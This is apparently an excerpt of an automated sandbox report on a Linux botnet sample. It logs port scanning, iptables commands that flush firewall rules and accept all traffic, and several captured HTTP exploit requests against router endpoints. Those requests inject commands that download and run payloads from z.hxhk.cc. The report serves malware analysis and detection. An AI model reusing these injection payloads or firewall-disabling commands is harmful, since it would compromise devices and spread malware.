Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.214.199.58:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.61.133.120:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.212.222.240:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.248.19.21:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.37.198.110:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.183.124.175:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.105.207.67:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.214.75.182:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.76.7.205:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.145.81.200:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.137.175.40:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.31.67.77:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.239.151.102:52869
Source: global traffic	TCP traffic: 192.168.2.23:22142 -> 190.72.96.21:52869

Source: /bin/sh (PID: 6231)	Iptables executable: /usr/sbin/iptables -> iptables -F	Jump to behavior
Source: /bin/sh (PID: 6238)	Iptables executable: /usr/sbin/iptables -> iptables -X	Jump to behavior
Source: /bin/sh (PID: 6241)	Iptables executable: /usr/sbin/iptables -> iptables -t nat -F	Jump to behavior
Source: /bin/sh (PID: 6246)	Iptables executable: /usr/sbin/iptables -> iptables -t nat -X	Jump to behavior
Source: /bin/sh (PID: 6249)	Iptables executable: /usr/sbin/iptables -> iptables -t mangle -F	Jump to behavior
Source: /bin/sh (PID: 6253)	Iptables executable: /usr/sbin/iptables -> iptables -t mangle -X	Jump to behavior
Source: /bin/sh (PID: 6256)	Iptables executable: /usr/sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6259)	Iptables executable: /usr/sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior
Source: /usr/sbin/ufw (PID: 6276)	Iptables executable: /usr/sbin/iptables -> /usr/sbin/iptables -V	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6281)	Iptables executable: /sbin/iptables -> iptables -F ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6282)	Iptables executable: /sbin/iptables -> iptables -F ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6283)	Iptables executable: /sbin/iptables -> iptables -F ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6284)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6285)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6286)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6287)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6288)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6289)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6290)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6291)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6292)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6293)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6294)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6295)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6296)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6297)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6298)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6299)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6300)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6301)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6302)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6303)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6304)	Iptables executable: /sbin/iptables -> iptables -F ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6305)	Iptables executable: /sbin/iptables -> iptables -F ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6306)	Iptables executable: /sbin/iptables -> iptables -F ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6307)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6308)	Iptables executable: /sbin/iptables -> iptables -F ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6309)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6310)	Iptables executable: /sbin/iptables -> iptables -F ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6311)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6312)	Iptables executable: /sbin/iptables -> iptables -F ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6313)	Iptables executable: /sbin/iptables -> iptables -Z ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6314)	Iptables executable: /sbin/iptables -> iptables -Z ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6315)	Iptables executable: /sbin/iptables -> iptables -Z ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6316)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6317)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6318)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6319)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6320)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6321)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6322)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6323)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6324)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6325)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6326)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6327)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6328)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6329)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6330)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6331)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6332)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6333)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6334)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6335)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6336)	Iptables executable: /sbin/iptables -> iptables -Z ufw-track-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6337)	Iptables executable: /sbin/iptables -> iptables -Z ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6338)	Iptables executable: /sbin/iptables -> iptables -Z ufw-reject-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6339)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6340)	Iptables executable: /sbin/iptables -> iptables -Z ufw-after-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6341)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6342)	Iptables executable: /sbin/iptables -> iptables -Z ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6343)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6344)	Iptables executable: /sbin/iptables -> iptables -Z ufw-before-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6345)	Iptables executable: /sbin/iptables -> iptables -X ufw-logging-deny	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6346)	Iptables executable: /sbin/iptables -> iptables -X ufw-logging-allow	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6347)	Iptables executable: /sbin/iptables -> iptables -X ufw-not-local	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6348)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6349)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6350)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-logging-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6351)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-limit-accept	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6352)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-limit	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6353)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6354)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6355)	Iptables executable: /sbin/iptables -> iptables -X ufw-user-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6356)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-input	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6357)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-output	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6358)	Iptables executable: /sbin/iptables -> iptables -X ufw-skip-to-policy-forward	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6359)	Iptables executable: /sbin/iptables -> iptables -P INPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6360)	Iptables executable: /sbin/iptables -> iptables -P OUTPUT ACCEPT	Jump to behavior
Source: /lib/ufw/ufw-init (PID: 6361)	Iptables executable: /sbin/iptables -> iptables -P FORWARD ACCEPT	Jump to behavior

Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Source: global traffic	HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 